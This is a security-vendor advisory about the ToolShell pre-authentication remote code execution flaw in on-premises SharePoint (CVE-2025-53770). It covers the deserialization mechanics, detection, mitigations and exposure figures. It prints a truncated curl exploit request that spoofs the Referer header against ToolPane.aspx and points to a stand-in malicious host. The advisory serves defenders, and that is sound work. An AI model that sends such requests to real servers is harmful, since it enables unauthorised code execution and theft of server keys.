ToolShell: Remote Code Execution in Microsoft SharePoint (CVE-2025-53770)

July 25, 2025 invoker category_news

Security Update News

Update Information

Title ToolShell: Remote Code Execution in Microsoft SharePoint (CVE-2025-53770)
Update ID WALLARMLAB:404FAFD231E5C37C2580D301BEEEFE3B
Type wallarmlab
Published 2025-07-25T14:17:00
Last Updated 2025-07-25T14:17:00

Security Impact

CVSS Score 9.8
Severity CRITICAL

Affected CVEs

  • CVE-2025-49704
  • CVE-2025-49706
  • CVE-2025-53770

Update Details

On July 19, 2025, a critical remote code execution (RCE) vulnerability (CVE-2025-53770, also referred to as ToolShell) was publicly disclosed, impacting on-premises Microsoft SharePoint Server installations. This vulnerability allows unauthenticated attackers to execute arbitrary code remotely by leveraging insecure deserialization techniques. Given the platform’s widespread use and exposure to the internet, the potential for compromise is substantial and growing, especially with confirmed active exploitation in the wild.

## **Vulnerability Overview**

CVE-2025-53770 targets Microsoft SharePoint via a flaw in **ViewState deserialization** , specifically triggered at the endpoint:

`/_layouts/15/ToolPane.aspx`

By abusing the **Referer header** (pointing to `/_layouts/SignOut.aspx`) and uploading a crafted .aspx file (e.g., spinstall0.aspx), attackers can bypass authentication and execute remote payloads. Once executed, these payloads can extract **ASP.NET machine keys** (`ValidationKey` and `DecryptionKey`) from the server, enabling the creation of malicious `ViewState` data that the server will accept as legitimate.

This vulnerability falls under “OWASP A08:2021 – Software and Data Integrity Failures,” specifically due to its insecure deserialization. The attack chain may also involve two auxiliary vulnerabilities: CVE-2025-49706 and CVE-2025-49704, which exacerbate the impact.

CVE-2025-53770 is classified as a critical pre-authentication remote code execution vulnerability, with an estimated CVSS score of 9.8, reflecting its ease of exploitation, lack of required privileges, and severe potential impact.

## **Exploitation in the Wild**

### **Exploit Mechanics**

The root cause lies in **insecure deserialization** via ViewState, specifically the injection of a malicious control such as:

``

This payload, when deserialized by SharePoint, leads to arbitrary code execution if the attacker already possesses machine keys. Below is a truncated exploit example via curl:

`curl -sk -X POST ‘https://victim.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx’ -H ‘Referer: /_layouts/SignOut.aspx’ -H ‘Content-Type: application/x-www-form-urlencoded’ –data-urlencode ‘MSOTlPn_Uri=https://malicious.com’ –data-urlencode ‘MSOTlPn_DWP=‘ `

## **Wallarm Response and Observed Exploitation**

Wallarm deployed detection rules shortly after disclosure to identify and block exploitation attempts of CVE-2025-53770. Within hours, Wallarm customers were protected. The rules detect crafted ViewState payloads and abnormal access to the vulnerable endpoint.

![A screenshot from the Wallarm interface showing a detected attack.](https://i0.wp.com/lab.wallarm.com/wp-content/uploads/2025/07/first-image.png?resize=770%2C321&ssl=1)

Wallarm detected immediate spikes in exploit attempts following the public disclosure:

![A line graph showing the increase in attacks detected by Wallarm starting July 20 and peaking on July 22](https://i0.wp.com/lab.wallarm.com/wp-content/uploads/2025/07/second-image.png?resize=770%2C473&ssl=1)

These figures show rapid adoption of the exploit code by threat actors. Public repositories on GitHub have already published working proof-of-concept payloads, lowering the bar for exploitation even further.

## Mitigation

Wallarm recommends clients:

* Patch affected SharePoint servers immediately
* Rotate ASP.NET cryptographic keys
* Inspect systems for indicators of compromise
* Isolate public-facing SharePoint instances if unpatched

This layered defense ensures both proactive mitigation and forensic readiness.

## **Conclusion**

CVE-2025-53770 is an example of the critical risks posed by pre-authentication RCE vulnerabilities in widely exposed platforms like Microsoft SharePoint. While patching and key rotation are essential, they alone are not sufficient to defend against rapidly evolving threats.

A Web Application and API Protection (WAAP) solution is vital to a multilayered security strategy, providing virtual patching, real-time threat detection, and attack surface protection, especially during the high-risk period between disclosure and remediation. Wallarm’s rapid response to this vulnerability illustrates how WAAP can effectively close the gap, blocking exploit attempts before they impact critical systems.

### **Risk Summary**

* Pre-auth RCE with high reliability
* Targets a widely-used enterprise collaboration platform
* Potential for data theft, lateral movement, and persistence

### **Public Exposure: Shodan Insights**

As of publication, **Shodan search results** show **16,405 internet-facing SharePoint instances** , many of which are likely vulnerable. This highlights the scale of exposure and the urgency of remediating public deployments.

![A screenshot from Shodan showing the number of detected instances of Sharepoint.](https://i0.wp.com/lab.wallarm.com/wp-content/uploads/2025/07/third-image.png?resize=487%2C768&ssl=1)

## **References**

* NVD NIST: CVE-2025-53770
* Vendor Advisory: Microsoft Guidance
* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770
* Security Research: GitHub Exploit Repository
* Exploit Payload: Example Payload

The post ToolShell: Remote Code Execution in Microsoft SharePoint (CVE-2025-53770) appeared first on Wallarm.

View Advisory Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.